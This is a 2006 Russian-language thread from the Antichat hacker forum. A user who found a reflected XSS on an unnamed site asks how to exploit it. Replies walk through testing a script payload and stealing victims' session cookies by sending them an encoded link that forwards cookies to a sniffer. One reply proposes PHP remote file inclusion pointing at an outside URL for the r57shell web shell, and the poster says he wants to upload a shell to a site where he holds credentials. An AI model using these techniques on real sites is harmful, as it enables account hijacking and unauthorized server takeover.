Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
что можно выжать из пасивной XSS |

06.08.2006, 08:49
|
|
Новичок
Регистрация: 22.11.2005
Сообщений: 13
Провел на форуме: 102758
Репутация:
3
|
|
что можно выжать из пасивной XSS
Вот нашёл страничку где я могу писать что хочу в адресной строке и это выводится на странице. Подскажите чтоб такого я мог бы сделать?
Cкрин
Думаю фильтра на знаки там нет
|
|
|

06.08.2006, 08:52
|
|
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме: 3986705
Репутация:
1403
|
|
А скрипты работают? Вмысле <script>alert()</script> работает?
|
|
|

06.08.2006, 09:06
|
|
Новичок
Регистрация: 22.11.2005
Сообщений: 13
Провел на форуме: 102758
Репутация:
3
|
|
Последний раз редактировалось strecher; 06.08.2006 в 09:24..
|
|
|

06.08.2006, 09:37
|
|
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме: 3986705
Репутация:
1403
|
|
ДА че нам до твоих скринов...
А там авторизация по кукам есть?
|
|
|

06.08.2006, 21:08
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме: 5355463
Репутация:
2258
|
|
пассивная хсс...если там авторизация есть, максимум что сможешь, это: подставишь в урл скрипт, отсылающий куки на снифер, закодируешь урл, дашь жертве урл, чтоб он зашел по этой ссылке...куки будут на снифере.
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|

06.08.2006, 23:20
|
|
Новичок
Регистрация: 21.03.2006
Сообщений: 7
Провел на форуме: 46994
Репутация:
3
|
|
А судя по второму скрину - там пхп иньекция, вместо antichat.ru поставь http://rst.void.ru/download/r57shell.txt?
|
|
|

06.08.2006, 23:47
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме: 5355463
Репутация:
2258
|
|
А судя по второму скрину - там пхп иньекция, вместо antichat.ru поставь http://rst.void.ru/download/r57shell.txt?
там он фрейм вставляет 
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|

06.08.2006, 23:49
|
|
Banned
Регистрация: 05.10.2005
Сообщений: 965
Провел на форуме: 5888800
Репутация:
547
|
|
Ты сперва КСС от ИНКЛУДА резлечи хоть.
|
|
|

07.08.2006, 02:26
|
|
Новичок
Регистрация: 22.11.2005
Сообщений: 13
Провел на форуме: 102758
Репутация:
3
|
|
авторизация есть, но у меня уже есть username:password
я просто в пхп нифига не понимаю
если есть было бы хорошо визуальный шелл туда загрузить
Последний раз редактировалось strecher; 07.08.2006 в 03:10..
|
|
|

07.08.2006, 02:27
|
|
Новичок
Регистрация: 22.11.2005
Сообщений: 13
Провел на форуме: 102758
Репутация:
3
|
|
точней кое что понимаю т.к. знаю asp
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|